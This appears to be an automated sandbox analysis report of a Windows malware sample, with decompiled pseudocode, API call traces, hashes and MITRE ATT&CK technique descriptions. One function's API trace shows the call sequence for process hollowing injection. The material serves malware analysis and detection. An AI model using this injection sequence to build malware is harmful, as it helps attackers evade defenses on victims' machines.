API ID: GetctypeLocinfo::_ctypestd::_std::bad_exception::bad_exception
String ID: 2^@
API String ID: 2674405937-2320161190
Opcode ID: 0116631074bcb9293018189d3321ef4837ce9d60397568c8b38699cbcd5ef7e0
Instruction ID: 038659545e62cf6c85caa0479139b008d356541d357042b339247e084cb19f82
Opcode Fuzzy Hash: 0116631074bcb9293018189d3321ef4837ce9d60397568c8b38699cbcd5ef7e0
Instruction Fuzzy Hash: 1FC0127220022867CB103E9AD80188ABF59FB957B5701803BBE4466391CB7A982097E5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: P2SMn3jloH.exePID: 3420, Parent PID: 4020COMMON

Execution Graph

Execution Coverage:	6.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	19
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0040180C Relevance: 3.0, APIs: 2, Instructions: 50
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 23%

			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t11;
				void* _t16;
				intOrPtr* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t22 = __eflags;
				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
				_t17 = _a4;
				Sleep(0x1388);
				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
				if(_t11 != 0) {
					_push(_a16);
					_push(_v8);
					_push(_t11);
					_push(_t17); // executed
					L00401455(0x60, _t19, _t20); // executed
				}
				 *_t17(0xffffffff, 0); // executed
				_t17 = _t17 + 0x60;
				_push(0x60);
				asm("pushad");
				__ecx =  *__esp;
				__esp = __esp + 4;
				return __eax;
			}

0x0040180c
0x00401839
0x0040183e
0x00401846
0x00401854
0x0040185b
0x0040185d
0x00401860
0x00401863
0x00401864
0x00401865
0x00401865
0x0040186e
0x0040187a
0x0040188a
0x0040188b
0x0040188c
0x0040188f
0x004018a2

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 00000001.00000002.350289380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401818 Relevance: 3.0, APIs: 2, Instructions: 45
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 00000001.00000002.350289380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401822 Relevance: 3.0, APIs: 2, Instructions: 44
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 17%

			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t11;
				intOrPtr* _t17;
				void* _t19;
				void* _t22;

				_t23 = __eflags;
				asm("out 0x95, eax");
				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
				_t17 =  *((intOrPtr*)(_t22 + 8));
				Sleep(0x1388);
				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t22 + 0x14)));
					_push( *((intOrPtr*)(_t22 - 4)));
					_push(_t11);
					_push(_t17); // executed
					L00401455(0x60, _t19, __edi); // executed
				}
				 *_t17(0xffffffff, 0); // executed
				_t17 = _t17 + 0x60;
				_push(0x60);
				asm("pushad");
				__ecx =  *__esp;
				__esp = __esp + 4;
				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
				_pop(__edi);
				_pop(__esi);
				_pop(__ebx);
				__esp = __ebp;
				_pop(__ebp);
				return __eax;
			}

0x00401822
0x00401822
0x00401839
0x0040183e
0x00401846
0x00401854
0x0040185b
0x0040185d
0x00401860
0x00401863
0x00401864
0x00401865
0x00401865
0x0040186e
0x0040187a
0x0040188a
0x0040188b
0x0040188c
0x0040188f
0x00401899
0x0040189e
0x0040189f
0x004018a0
0x004018a1
0x004018a1
0x004018a2

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 00000001.00000002.350289380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401826 Relevance: 3.0, APIs: 2, Instructions: 40
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 17%

			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t8;
				void* _t11;
				intOrPtr* _t17;
				void* _t19;
				void* _t22;

				_t23 = __eflags;
				asm("sbb ebx, ebp");
				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
				_t17 =  *((intOrPtr*)(_t22 + 8));
				Sleep(0x1388);
				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t22 + 0x14)));
					_push( *((intOrPtr*)(_t22 - 4)));
					_push(_t11);
					_push(_t17); // executed
					L00401455(0x60, _t19, __edi); // executed
				}
				 *_t17(0xffffffff, 0); // executed
				_t17 = _t17 + 0x60;
				_push(0x60);
				asm("pushad");
				__ecx =  *__esp;
				__esp = __esp + 4;
				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
				_pop(__edi);
				_pop(__esi);
				_pop(__ebx);
				__esp = __ebp;
				_pop(__ebp);
				return __eax;
			}

0x00401826
0x00401826
0x00401839
0x0040183e
0x00401846
0x00401854
0x0040185b
0x0040185d
0x00401860
0x00401863
0x00401864
0x00401865
0x00401865
0x0040186e
0x0040187a
0x0040188a
0x0040188b
0x0040188c
0x0040188f
0x00401899
0x0040189e
0x0040189f
0x004018a0
0x004018a1
0x004018a1
0x004018a2

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 00000001.00000002.350289380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B

Uniqueness

Uniqueness Score: -1.00%

Function 00401834 Relevance: 3.0, APIs: 2, Instructions: 39
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 20%

			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t10;
				void* _t13;
				intOrPtr* _t19;
				void* _t22;
				void* _t25;

				_t26 = __eflags;
				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
				_t19 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
				if(_t13 != 0) {
					_push( *((intOrPtr*)(_t25 + 0x14)));
					_push( *((intOrPtr*)(_t25 - 4)));
					_push(_t13);
					_push(_t19); // executed
					L00401455(0x60, _t22, __edi); // executed
				}
				 *_t19(0xffffffff, 0); // executed
				_t19 = _t19 + 0x60;
				_push(0x60);
				asm("pushad");
				__ecx =  *__esp;
				__esp = __esp + 4;
				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
				_pop(__edi);
				_pop(__esi);
				_pop(__ebx);
				__esp = __ebp;
				_pop(__ebp);
				return __eax;
			}

0x00401834
0x00401839
0x0040183e
0x00401846
0x00401854
0x0040185b
0x0040185d
0x00401860
0x00401863
0x00401864
0x00401865
0x00401865
0x0040186e
0x0040187a
0x0040188a
0x0040188b
0x0040188c
0x0040188f
0x00401899
0x0040189e
0x0040189f
0x004018a0
0x004018a1
0x004018a1
0x004018a2

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 00000001.00000002.350289380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: utisvaaPID: 1280, Parent PID: 1080COMMON

Execution Graph

Execution Coverage:	64.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	26
Total number of Limit Nodes:	7

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 021A0110 Relevance: 22.7, APIs: 15, Instructions: 248
memorynativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 021A0156
GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 021A016C
CreateProcessA.KERNELBASE(?,00000000), ref: 021A0255
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 021A0270
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 021A0283
GetThreadContext.KERNELBASE(00000000,?), ref: 021A029F
ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 021A02C8
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 021A02E3
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 021A0304
NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 021A032A
NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 021A0399
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 021A03BF
SetThreadContext.KERNELBASE(00000000,?), ref: 021A03E1
ResumeThread.KERNELBASE(00000000), ref: 021A03ED
ExitProcess.KERNEL32(00000000), ref: 021A0412

Memory Dump Source

Source File: 0000000C.00000002.395307113.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_21a0000_utisvaa.jbxd

Similarity

API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
String ID:
API String ID: 2875986403-0
Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction ID: 1d87489d64599aa1e2c5c946e2bd55bc882d2a87137a0b18cea8062c9c53d729
Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction Fuzzy Hash: 7CB1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E909AB391D771AE41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 021A0420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 021A0533

Strings

saodkfnosa9uin, xrefs: 021A04DA
d, xrefs: 021A0584
mfoaskdfnoa, xrefs: 021A0520, 021A0523
0, xrefs: 021A0492

Memory Dump Source

Source File: 0000000C.00000002.395307113.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_21a0000_utisvaa.jbxd

Similarity

API ID: CreateWindow
String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
API String ID: 716092398-2341455598
Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction ID: b725735002c7845be1bed18fb32927c8243fbbd6bf4e28c427347c2071ccd961
Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction Fuzzy Hash: 97513870D48388DEEB11CBE8C859BDDBFB2AF15708F144058D5487F286C3BA5658CB62

Uniqueness

Uniqueness Score: -1.00%

Function 021A05B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(apfHQ), ref: 021A05EC

Strings

apfHQ, xrefs: 021A05E2, 021A05E5
o, xrefs: 021A0600

Memory Dump Source

Source File: 0000000C.00000002.395307113.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_21a0000_utisvaa.jbxd

Similarity

API ID: AttributesFile
String ID: apfHQ$o
API String ID: 3188754299-2999369273
Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction ID: 4792514202a5a1d8e86b964b1383f2e6e8287125131d16bb7809024c59359fde
Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction Fuzzy Hash: 9A012174C0425CEEDF14DB98C5283AEBFB5AF45308F1480D9C4192B241D7769B59CBA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: utisvaaPID: 5332, Parent PID: 1280COMMON

Execution Graph

Execution Coverage:	6.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	19
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0040180C Relevance: 3.0, APIs: 2, Instructions: 50
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 23%

			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t11;
				void* _t16;
				intOrPtr* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t22 = __eflags;
				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
				_t17 = _a4;
				Sleep(0x1388);
				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
				if(_t11 != 0) {
					_push(_a16);
					_push(_v8);
					_push(_t11);
					_push(_t17); // executed
					L00401455(0x60, _t19, _t20); // executed
				}
				 *_t17(0xffffffff, 0); // executed
				_t17 = _t17 + 0x60;
				_push(0x60);
				asm("pushad");
				__ecx =  *__esp;
				__esp = __esp + 4;
				return __eax;
			}

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 0000000D.00000002.408548750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_utisvaa.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401818 Relevance: 3.0, APIs: 2, Instructions: 45
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 0000000D.00000002.408548750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_utisvaa.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401822 Relevance: 3.0, APIs: 2, Instructions: 44
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 17%

			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t11;
				intOrPtr* _t17;
				void* _t19;
				void* _t22;

				_t23 = __eflags;
				asm("out 0x95, eax");
				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
				_t17 =  *((intOrPtr*)(_t22 + 8));
				Sleep(0x1388);
				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t22 + 0x14)));
					_push( *((intOrPtr*)(_t22 - 4)));
					_push(_t11);
					_push(_t17); // executed
					L00401455(0x60, _t19, __edi); // executed
				}
				 *_t17(0xffffffff, 0); // executed
				_t17 = _t17 + 0x60;
				_push(0x60);
				asm("pushad");
				__ecx =  *__esp;
				__esp = __esp + 4;
				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
				_pop(__edi);
				_pop(__esi);
				_pop(__ebx);
				__esp = __ebp;
				_pop(__ebp);
				return __eax;
			}

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 0000000D.00000002.408548750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_utisvaa.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401826 Relevance: 3.0, APIs: 2, Instructions: 40
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 17%

			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t8;
				void* _t11;
				intOrPtr* _t17;
				void* _t19;
				void* _t22;

				_t23 = __eflags;
				asm("sbb ebx, ebp");
				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
				_t17 =  *((intOrPtr*)(_t22 + 8));
				Sleep(0x1388);
				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t22 + 0x14)));
					_push( *((intOrPtr*)(_t22 - 4)));
					_push(_t11);
					_push(_t17); // executed
					L00401455(0x60, _t19, __edi); // executed
				}
				 *_t17(0xffffffff, 0); // executed
				_t17 = _t17 + 0x60;
				_push(0x60);
				asm("pushad");
				__ecx =  *__esp;
				__esp = __esp + 4;
				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
				_pop(__edi);
				_pop(__esi);
				_pop(__ebx);
				__esp = __ebp;
				_pop(__ebp);
				return __eax;
			}

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 0000000D.00000002.408548750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_utisvaa.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B

Uniqueness

Uniqueness Score: -1.00%

Function 00401834 Relevance: 3.0, APIs: 2, Instructions: 39
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 20%

			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t10;
				void* _t13;
				intOrPtr* _t19;
				void* _t22;
				void* _t25;

				_t26 = __eflags;
				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
				_t19 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
				if(_t13 != 0) {
					_push( *((intOrPtr*)(_t25 + 0x14)));
					_push( *((intOrPtr*)(_t25 - 4)));
					_push(_t13);
					_push(_t19); // executed
					L00401455(0x60, _t22, __edi); // executed
				}
				 *_t19(0xffffffff, 0); // executed
				_t19 = _t19 + 0x60;
				_push(0x60);
				asm("pushad");
				__ecx =  *__esp;
				__esp = __esp + 4;
				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
				_pop(__edi);
				_pop(__esi);
				_pop(__ebx);
				__esp = __ebp;
				_pop(__ebp);
				return __eax;
			}

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 0000000D.00000002.408548750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_utisvaa.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
